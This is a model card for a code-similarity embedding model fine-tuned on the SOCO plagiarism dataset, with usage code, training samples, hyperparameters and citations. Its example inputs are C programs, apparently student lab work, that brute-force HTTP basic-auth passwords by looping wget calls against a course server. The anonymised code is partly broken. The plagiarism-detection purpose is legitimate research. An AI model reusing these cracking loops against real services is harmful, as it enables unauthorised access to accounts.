SentenceTransformer based on microsoft/unixcoder-base-unimodal

This is a sentence-transformers model fine-tuned from microsoft/unixcoder-base-unimodal. It maps sentences and paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.

Model Details

Model Description

  • Model Type: Sentence Transformer
  • Base model: microsoft/unixcoder-base-unimodal
  • Maximum Sequence Length: 512 tokens
  • Output Dimensionality: 768 dimensions
  • Similarity Function: Cosine Similarity
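
The card lists cosine similarity as the similarity function. The following is a minimal sketch of that measure in plain Python, using toy 3-dimensional vectors in place of real 768-dimensional embeddings. The function name `cosine_similarity` is chosen here for illustration and is not the library's implementation.

```python
import math

def cosine_similarity(u, v):
    """Cosine of the angle between two equal-length vectors."""
    if len(u) != len(v):
        raise ValueError("vectors must have the same length")
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0.0 or norm_v == 0.0:
        raise ValueError("cosine similarity is undefined for a zero vector")
    return dot / (norm_u * norm_v)

# Toy vectors standing in for 768-dimensional embeddings.
print(cosine_similarity([1.0, 2.0, 3.0], [2.0, 4.0, 6.0]))  # parallel vectors
print(cosine_similarity([1.0, 0.0, 0.0], [0.0, 1.0, 0.0]))  # orthogonal vectors
```

Because the score depends only on direction, scaling an embedding does not change its similarity to other embeddings.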

Full Model Architecture

SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
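
The Pooling module above has only `pooling_mode_mean_tokens` enabled, so a sentence embedding is the average of its token embeddings. The sketch below illustrates that idea in plain Python, assuming padding tokens are marked with 0 in an attention mask. The helper `mean_pool` and the toy 2-dimensional vectors are hypothetical and stand in for the library's tensor code.

```python
def mean_pool(token_embeddings, attention_mask):
    """Average the token vectors whose mask entry is 1 (padding is skipped)."""
    dim = len(token_embeddings[0])
    summed = [0.0] * dim
    count = 0
    for vector, keep in zip(token_embeddings, attention_mask):
        if keep:
            count += 1
            for i, value in enumerate(vector):
                summed[i] += value
    if count == 0:
        raise ValueError("attention mask selects no tokens")
    return [total / count for total in summed]

# Two real tokens followed by one padding token (mask entry 0).
tokens = [[1.0, 2.0], [3.0, 4.0], [100.0, 100.0]]
mask = [1, 1, 0]
print(mean_pool(tokens, mask))  # [2.0, 3.0]
```

The padding vector has no effect on the result, which is why the mask matters when inputs of different lengths are batched together.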

Usage

Direct Usage (Sentence Transformers)

First install the Sentence Transformers library:

pip install -U sentence-transformers

Then you can load this model and run inference.

from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-C-UniXcoder-ST-0")
# Run inference
sentences = [
    '\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\n\nint genchkpwd(char *chararray,char *passwd)\n {\n   int i,j,k,success;\n   char str1[MAX_SIZE],str2[MAX_SIZE],tempstr[MAX_SIZE];\n   \n   \n   strcpy(str1,"wget --http-user= --http-passwd=");\n   strcpy(str2," http://sec-crack.cs.rmit.edu./SEC/2/");\n   strcpy(tempstr,"");\n\n\n\n   for(i=0;i<52;i++)\n    {\n      passwd[0]= chararray[i];\n      strcat(tempstr,str1);\n      strcat(tempstr,passwd);\n      strcat(tempstr,str2);\n      printf("SENDING REQUEST AS %s\\n",tempstr);\n      success=system (tempstr);\n      if (success==0)\n       return 1;\n      else\n       strcpy(tempstr,""); \n       strcpy(passwd,"");\n     }     \n\n\n\n   for(i=0;i<52;i++)\n    {\n      passwd[0]= chararray[i];\n      for(j=0;j<52;j++)\n       {\n         passwd[1]=chararray[j];\n\t strcat(tempstr,str1);\n         strcat(tempstr,passwd);\n         strcat(tempstr,str2);\n         printf("SENDING REQUEST AS %s\\n",tempstr);\n         success=system (tempstr);\n         if (success==0)\n           return 1;\n         else\n         strcpy(tempstr,""); \n         \n      }     \n    }\n\n\n\n   for(i=0;i<52;i++)\n    {\n      passwd[0]= chararray[i];\n      for(j=0;j<52;j++)\n       {\n         passwd[1]=chararray[j];\n         for(k=0;k<52;k++)\n\t  {\n\t    passwd[2]=chararray[k];\n\t    strcat(tempstr,str1);\n            strcat(tempstr,passwd);\n            strcat(tempstr,str2);\n            printf("SENDING REQUEST AS %s\\n",tempstr);\n            success=system (tempstr);\n            if (success==0)\n              return 1;\n            else\n              strcpy(tempstr,""); \n\t  }    \n       }     \n     }\n   return 1;\n  }  \n\nint  (int argc, char *argv[])\n {\n     char chararray[52],passwd[3];\n     int i,success;\n     char ch=\'a\';\n\n\n     \n     int , end;    \n      = time();\t \n\n     for (i=0;i<3;i++)\n      {\n          passwd[i]=\'\\0\';\n      }  
\n\n\n\n     for (i=0;i<26;i++)\n      {\n          chararray[i]= ch;\n\t  ch++;\n      }\n      ch=\'A\';  \n     for (i=26;i<52;i++)\n      {\n          chararray[i]= ch;\n\t  ch++;\n      }\n\n\n\n      success=genchkpwd(chararray,passwd);\n      printf("\\nPassword is %s\\n",passwd); \n      getpid();\n      end = time(); \n      printf("Time required = %lld msec\\n",(end-)/());\n     return (EXIT_SUCCESS);\n  }\n     \n\t   \n\t  \t\n',
    '\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar a[100],c[100],c1[100],c2[100],m[50];\nchar b[53]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n\nint i,j,k,count=0;\nint  total_time,start_time,end_time;\nstart_time = time();\n\n\nfor(i=0;i<52;i++)\n{\n\t\n\tm[0]=b[i];\n\tm[1]=\'\\0\';\n\tstrcpy(c,m);\n\tprintf("%s \\n",c);\n\tfor(j=0;j<52;j++)\n\t{\n\tm[0]=b[j];\n\tm[1]=\'\\0\';\n\tstrcpy(c1,c);\n\tstrcat(c1,m);\n\tprintf("%s \\n",c1);\n\tfor(k=0;k<52;k++)\n\t{\n\t\tcount++;\n\t\tprintf("ATTEMPT :%d\\n",count);\n\t\t\n\t\tm[0]=b[k];\n\t\tm[1]=\'\\0\';\n\t\tstrcpy(c2,c1);\n\t\tstrcat(c2,m);\n\nstrcpy(a,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php --http-user= --http-passwd=");\n\n\t\tstrcat(a,c2);\t\t\n\t\tif(system(a)==0)\n\t\t{\n\t\tprintf("Congratulations!!!!BruteForce Attack Successful\\n");\n\t\tprintf("***********************************************\\n");\n\t\tprintf("The Password is %s\\n",c2);\n\t\tprintf("The Request sent is %s\\n",a); \n                end_time = time();\n                total_time = (end_time -start_time);\n                total_time /= 1000000000.0;\n                printf("The Time Taken is : %llds\\n",total_time);\n\t\texit(1);\n\t\t}\n\t\t\n\t\t\n\t\t\n\t\t\n\t}\n\n}\n}\nreturn 0;\n}\n',
    '#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<ctype.h>\n#include<time.h>\n\nint ()\n{\n\n int m,n,o,i;\n char URL[255];\n char v[3];\n char temp1[100];\nchar temp2[100];\nchar temp3[250];\nchar [53]={\'a\',\'A\',\'b\',\'B\',\'c\',\'C\',\'d\',\'D\',\'e\',\'E\',\'f\',\'F\',\'g\',\'G\',\'h\',\'H\',\'i\',\'I\',\'j\',\'J\',\'k\',\'K\',\'l\',\'L\',\'m\',\'M\',\'n\',\'N\',\'o\',\'O\',\'p\',\'P\',\'q\',\'Q\',\'r\',\'R\',\'s\',\'S\',\'t\',\'T\',\'u\',\'U\',\'v\',\'V\',\'w\',\'W\',\'x\',\'X\',\'y\',\'Y\',\'z\',\'Z\'};\ntime_t u1,u2;\n\n  (void) time(&u1); \n strcpy(temp1,"wget --http-user= --http-passwd=");\n strcpy(temp2," http://sec-crack.cs.rmit.edu./SEC/2/index.php");\n \n for(m=0;m<=51;m++)\n {\n   v[0]=[m]; \n   v[1]=\'\\0\';\n   v[2]=\'\\0\';\n   strcpy(URL,v); \n   printf("\\nTesting with password %s\\n",URL);\n   strcat(temp3,temp1);\n   strcat(temp3,URL);\n   strcat(temp3,temp2);\n   printf("\\nSending the  %s\\n",temp3);\n   i=system(temp3); \n   \t\n\tif(i==0)\n   \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken  crack the password is  %d  second\\n\\n",(int)(u2-u1));\n     \t exit(0);\n   \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n  for(n=0;n<=51;n++)\n  {\n   v[0]=[m]; \n   v[1]=[n];\n   v[2]=\'\\0\';\n   strcpy(URL,v); \n   printf("\\nTesting with password %s\\n",URL);\n   strcat(temp3,temp1);\n   strcat(temp3,URL);\n   strcat(temp3,temp2);\n   printf("\\nSending the  %s\\n",temp3);\n   i=system(temp3);\n   \t\n\tif(i==0)\n   \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken  crack the password is  %d  second\\n\\n",(int)(u2-u1));\n     \t exit(0);\n   \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n   for(o=0;o<=51;o++)\n   { \n   v[0]=[m]; \n   v[1]=[n];\n   v[2]=[o];\n   strcpy(URL,v); \n   printf("\\nTesting with password %s\\n",URL);\n   strcat(temp3,temp1);\n   strcat(temp3,URL);\n   strcat(temp3,temp2);\n   
printf("\\nSending the  %s\\n",temp3);\n   i=system(temp3);\n   \t\n\tif(i==0)\n   \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken  crack the password is  %d  second\\n\\n",(int)(u2-u1));\n     \t exit(0);\n   \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n   \n   \n   }\n  }\n }  \n  \n}  \n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# (3, 768)

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.9111, 0.9288],
#         [0.9111, 1.0000, 0.9562],
#         [0.9288, 0.9562, 1.0000]])
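
To read the matrix above, it can help to rank the off-diagonal pairs. The sketch below does this in plain Python with the scores copied from the printed tensor. `rank_pairs` is a hypothetical helper, and with a real tensor one would first convert it to nested lists, for example with `similarities.tolist()`.

```python
from itertools import combinations

# Scores copied from the similarity tensor printed above.
similarities = [
    [1.0000, 0.9111, 0.9288],
    [0.9111, 1.0000, 0.9562],
    [0.9288, 0.9562, 1.0000],
]

def rank_pairs(matrix):
    """Return (score, i, j) for every pair i < j, highest score first."""
    pairs = [(matrix[i][j], i, j) for i, j in combinations(range(len(matrix)), 2)]
    return sorted(pairs, reverse=True)

for score, i, j in rank_pairs(similarities):
    print(f"sentences[{i}] vs sentences[{j}]: {score:.4f}")
```

In this example the second and third programs form the closest pair (0.9562), and the first and second the most distant (0.9111).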

Training Details

Training Dataset

Unnamed Dataset

  • Size: 3,081 training samples
  • Columns: sentence_0, sentence_1, and label
  • Approximate statistics based on the first 1000 samples:
    column      type    details
    sentence_0  string  min: 177 tokens, mean: 436.43 tokens, max: 512 tokens
    sentence_1  string  min: 177 tokens, mean: 421.53 tokens, max: 512 tokens
    label       int     0: ~99.20%, 1: ~0.80%
  • Samples:
    sentence_0, sentence_1, label (cells are listed in this order for each sample; long code cells are truncated with "...")

    #include
    #include
    #include
    #include
    #include

    #define MSG_FILE "msg"
    #define EMAIL_TO "@cs.rmit.edu."
    #define TRUE 1
    #define FALSE 0


    void genLog(char *logFile, const char *URL);
    void getPage(const char URL, const char fname);
    int getCurTime();
    int logDiff(const char logFile, int time);
    int isFileExist(const char fname);
    void sendMail(const char
    emailTo, const char
    subject, const char
    msgFile
    , const char
    log);

    int (int argc, char **argv)
    {
    int time_var;
    char *URL;
    int upTime = 0;
    char logFile[256];
    int logSent = FALSE;
    char subject[256];

    if (argc != 3)
    {
    fprintf(stderr, "\nUsage: ./WatchDog URL timeIntervalInSec\n");
    exit(1);
    }
    else
    {
    time_var = atoi(argv[2]);

    URL = malloc(strlen(argv[1]));

    if (URL)
    {
    for (;;)
    {
    if (((int)difftime(upTime, getCurTime()) % time_var == 0)
    && !logSent)
    {
    strncpy(URL, argv[1], strlen(argv[1]));
    genLog(logFile, URL);
    ...
    #include
    #include
    #include
    #include
    #include
    #include
    #include



    char* joinMe(char* t, char* t2)
    {
    char* result;
    int length = 0;
    int j = 0;
    int counter = 0;

    length = strlen(t) + strlen(t2) + 1;

    result = malloc(sizeof(char) * length);


    for(j = 0; j {
    result[j] = t[j];
    }


    for(j = strlen(t); j {
    result[j] = t2[counter];
    counter++;
    }


    result[length-1] = '\0';

    return result;
    }


    void check(char** smallcmd)
    {
    int pid = 0;
    int status;


    if( (pid = fork()) == 0)
    {

    execvp(smallcmd[0],smallcmd);
    }
    else
    {

    while(wait(&status) != pid);
    }
    }

    int (void)
    {
    int i = 0, j = 0, k = 0;
    char** smallcmd;
    int count = 0;
    FILE *myFile,*myFile2,myFile3;
    int compare1;
    char
    myString;
    int length = 0;
    int start1, end1;


    myString = malloc(sizeof(char) * 100);
    smallcmd = malloc(sizeof(char *) * 8);

    smallcmd[0] = "/usr/local//wget";

    smallcm...
    label: 0

    #include
    #include
    #include
    #include
    #include

    #define MSG_FILE "msg"
    #define EMAIL_TO "@cs.rmit.edu."
    #define TRUE 1
    #define FALSE 0


    void genLog(char *logFile, const char *URL);
    void getPage(const char URL, const char fname);
    int getCurTime();
    int logDiff(const char logFile, int time);
    int isFileExist(const char fname);
    void sendMail(const char
    emailTo, const char
    subject, const char
    msgFile
    , const char
    log);

    int (int argc, char **argv)
    {
    int time_var;
    char *URL;
    int upTime = 0;
    char logFile[256];
    int logSent = FALSE;
    char subject[256];

    if (argc != 3)
    {
    fprintf(stderr, "\nUsage: ./WatchDog URL timeIntervalInSec\n");
    exit(1);
    }
    else
    {
    time_var = atoi(argv[2]);

    URL = malloc(strlen(argv[1]));

    if (URL)
    {
    for (;;)
    {
    if (((int)difftime(upTime, getCurTime()) % time_var == 0)
    && !logSent)
    {
    strncpy(URL, argv[1], strlen(argv[1]));
    genLog(logFile, URL);
    ...
    #include
    #include
    #include
    #include
    #include

    int ()
    {
    char lc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    char uc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    char gc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    int a=0,b=0,c=0,d,e,count=0;
    char [100],temp1[100],temp2[100],temp3[100],temp4[10],temp5[50],p[100],q[50],r[50];
    char result,result1,result2,mx[100],mx1,mx2,mx3,mx4;

    int ,end,t;
    = time();
    while(sizeof(lc)!=52)
    {
    temp2[0]=lc[d];
    temp2[1]='\0';
    d=d+1;
    strcpy(p,temp2);

    while(sizeof(uc)!=52)
    {
    temp3[0]=uc[b];
    temp3[1]='\0';
    b=b+1;
    strcpy(q,p);
    strcat(q,temp3);
    for(e=0;e<52;e++)
    {
    temp1[0]=gc[e];
    temp1[1]='\0';
    strcpy(r,q);
    strcat(r,temp1);
    strcpy(mx,"wget http://sec-crack.cs.rmit.edu./SEC/2 --http-user= --http-passwd=");
    strcat(mx,r);
    printf("temp3=%s\n",mx);
    if(sy...
    label: 0

    #include
    #include
    #include
    #define TRUE 0
    ()
    {
    FILE fp;
    system("rmdir ./www.cs.rmit.edu.");
    char chk[1];
    strcpy(chk,"n");
    while(1)
    {

    system("wget -p http://www.cs.rmit.edu./students/");

    system("md5sum ./www.cs.rmit.edu./images/
    .* > ./www.cs.rmit.edu./text1.txt");


    if (strcmp(chk,"n")==0)
    {
    system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt");
    system("mkdir ./");

    system("mv ./www.cs.rmit.edu./students/index.html ./");
    }
    else
    {


    system(" diff ./www.cs.rmit.edu./students/index.html .//index.html
    mail @cs.rmit.edu. ");
    system(" diff ./www.cs.rmit.edu./text1.txt ./text2.txt
    mail @cs.rmit.edu. ");
    system("mv ./www.cs.rmit.edu./students/index.html ./");
    system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt");
    }
    sleep(86400);
    strcpy(chk,"y");

    }
    }


  • Loss: BatchAllTripletLoss
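
As a rough illustration of the batch-all strategy from the Hermans et al. paper cited below, the sketch here builds every valid (anchor, positive, negative) triplet in a batch from the labels and averages the hinge loss over the triplets that still violate the margin. It is plain Python rather than the library's code. The Euclidean distance and `margin=5.0` are assumptions about the loss configuration, which the card does not state, and the toy 2-dimensional embeddings are made up.

```python
import math

def euclidean(u, v):
    """Euclidean distance between two equal-length vectors."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(u, v)))

def batch_all_triplet_loss(embeddings, labels, margin=5.0):
    """Mean hinge loss over all valid triplets with a positive loss."""
    n = len(labels)
    active = []
    for a in range(n):
        for p in range(n):
            # A positive shares the anchor's label but is a different item.
            if p == a or labels[p] != labels[a]:
                continue
            for neg in range(n):
                # A negative has a different label from the anchor.
                if labels[neg] == labels[a]:
                    continue
                d_pos = euclidean(embeddings[a], embeddings[p])
                d_neg = euclidean(embeddings[a], embeddings[neg])
                loss = d_pos - d_neg + margin
                if loss > 0.0:
                    active.append(loss)
    return sum(active) / len(active) if active else 0.0

# Toy batch: items 0 and 1 share a label, item 2 belongs to another class.
toy_embeddings = [[0.0, 0.0], [3.0, 0.0], [4.0, 0.0]]
toy_labels = [1, 1, 0]
print(batch_all_triplet_loss(toy_embeddings, toy_labels))  # 5.5
```

Here the two valid triplets contribute losses of 4.0 and 7.0, so the batch loss is their mean. Triplets that already satisfy the margin contribute nothing and are excluded from the average.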

Training Hyperparameters

Non-Default Hyperparameters

  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • num_train_epochs: 1
  • fp16: True
  • multi_dataset_batch_sampler: round_robin
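
For orientation, the batch size and epoch count above imply a fairly short run on the 3,081 training samples. The arithmetic below is a sketch that assumes a single device and that each sample is seen once per epoch. It relies on `gradient_accumulation_steps: 1` and `dataloader_drop_last: False` from the full hyperparameter list.

```python
import math

train_samples = 3081   # "Size" reported for the training dataset
batch_size = 16        # per_device_train_batch_size
epochs = 1             # num_train_epochs

# With drop_last disabled, the final partial batch still counts as a step.
steps_per_epoch = math.ceil(train_samples / batch_size)
last_batch_size = train_samples - (steps_per_epoch - 1) * batch_size
total_steps = steps_per_epoch * epochs

print(steps_per_epoch, last_batch_size, total_steps)  # 193 9 193
```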

All Hyperparameters

  • overwrite_output_dir: False
  • do_predict: False
  • eval_strategy: no
  • prediction_loss_only: True
  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • per_gpu_train_batch_size: None
  • per_gpu_eval_batch_size: None
  • gradient_accumulation_steps: 1
  • eval_accumulation_steps: None
  • torch_empty_cache_steps: None
  • learning_rate: 5e-05
  • weight_decay: 0.0
  • adam_beta1: 0.9
  • adam_beta2: 0.999
  • adam_epsilon: 1e-08
  • max_grad_norm: 1
  • num_train_epochs: 1
  • max_steps: -1
  • lr_scheduler_type: linear
  • lr_scheduler_kwargs: {}
  • warmup_ratio: 0.0
  • warmup_steps: 0
  • log_level: passive
  • log_level_replica: warning
  • log_on_each_node: True
  • logging_nan_inf_filter: True
  • save_safetensors: True
  • save_on_each_node: False
  • save_only_model: False
  • restore_callback_states_from_checkpoint: False
  • no_cuda: False
  • use_cpu: False
  • use_mps_device: False
  • seed: 42
  • data_seed: None
  • jit_mode_eval: False
  • use_ipex: False
  • bf16: False
  • fp16: True
  • fp16_opt_level: O1
  • half_precision_backend: auto
  • bf16_full_eval: False
  • fp16_full_eval: False
  • tf32: None
  • local_rank: 0
  • ddp_backend: None
  • tpu_num_cores: None
  • tpu_metrics_debug: False
  • debug: []
  • dataloader_drop_last: False
  • dataloader_num_workers: 0
  • dataloader_prefetch_factor: None
  • past_index: -1
  • disable_tqdm: False
  • remove_unused_columns: True
  • label_names: None
  • load_best_model_at_end: False
  • ignore_data_skip: False
  • fsdp: []
  • fsdp_min_num_params: 0
  • fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
  • fsdp_transformer_layer_cls_to_wrap: None
  • accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
  • deepspeed: None
  • label_smoothing_factor: 0.0
  • optim: adamw_torch
  • optim_args: None
  • adafactor: False
  • group_by_length: False
  • length_column_name: length
  • ddp_find_unused_parameters: None
  • ddp_bucket_cap_mb: None
  • ddp_broadcast_buffers: False
  • dataloader_pin_memory: True
  • dataloader_persistent_workers: False
  • skip_memory_metrics: True
  • use_legacy_prediction_loop: False
  • push_to_hub: False
  • resume_from_checkpoint: None
  • hub_model_id: None
  • hub_strategy: every_save
  • hub_private_repo: None
  • hub_always_push: False
  • gradient_checkpointing: False
  • gradient_checkpointing_kwargs: None
  • include_inputs_for_metrics: False
  • include_for_metrics: []
  • eval_do_concat_batches: True
  • fp16_backend: auto
  • push_to_hub_model_id: None
  • push_to_hub_organization: None
  • mp_parameters:
  • auto_find_batch_size: False
  • full_determinism: False
  • torchdynamo: None
  • ray_scope: last
  • ddp_timeout: 1800
  • torch_compile: False
  • torch_compile_backend: None
  • torch_compile_mode: None
  • include_tokens_per_second: False
  • include_num_input_tokens_seen: False
  • neftune_noise_alpha: None
  • optim_target_modules: None
  • batch_eval_metrics: False
  • eval_on_start: False
  • use_liger_kernel: False
  • eval_use_gather_object: False
  • average_tokens_across_devices: False
  • prompts: None
  • batch_sampler: batch_sampler
  • multi_dataset_batch_sampler: round_robin
  • router_mapping: {}
  • learning_rate_mapping: {}
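
The combination `lr_scheduler_type: linear`, `learning_rate: 5e-05`, and `warmup_steps: 0` means the learning rate starts at its peak and decays linearly to zero. The sketch below reproduces that shape in plain Python. The function `linear_lr` is hypothetical, and the total of 193 optimizer steps is an assumption derived from 3,081 samples at batch size 16 on one device.

```python
def linear_lr(step, total_steps, base_lr=5e-05, warmup_steps=0):
    """Learning rate at `step`: linear warmup, then linear decay to zero."""
    if step < warmup_steps:
        return base_lr * step / max(1, warmup_steps)
    remaining = max(0, total_steps - step)
    return base_lr * remaining / max(1, total_steps - warmup_steps)

TOTAL_STEPS = 193  # assumption: ceil(3081 / 16) optimizer steps on one device

# Print the rate at the start, near the middle, and at the end of training.
for step in (0, 96, 193):
    print(step, linear_lr(step, TOTAL_STEPS))
```

With no warmup, the first optimizer step already uses the full learning rate, and the rate reaches zero at the final step.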

Framework Versions

  • Python: 3.11.13
  • Sentence Transformers: 5.0.0
  • Transformers: 4.52.4
  • PyTorch: 2.6.0+cu124
  • Accelerate: 1.8.1
  • Datasets: 3.6.0
  • Tokenizers: 0.21.2

Citation

BibTeX

Sentence Transformers

@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}

BatchAllTripletLoss

@misc{hermans2017defense,
    title={In Defense of the Triplet Loss for Person Re-Identification},
    author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
    year={2017},
    eprint={1703.07737},
    archivePrefix={arXiv},
    primaryClass={cs.CV}
}

Model size: 125M params (Safetensors, tensor type F32)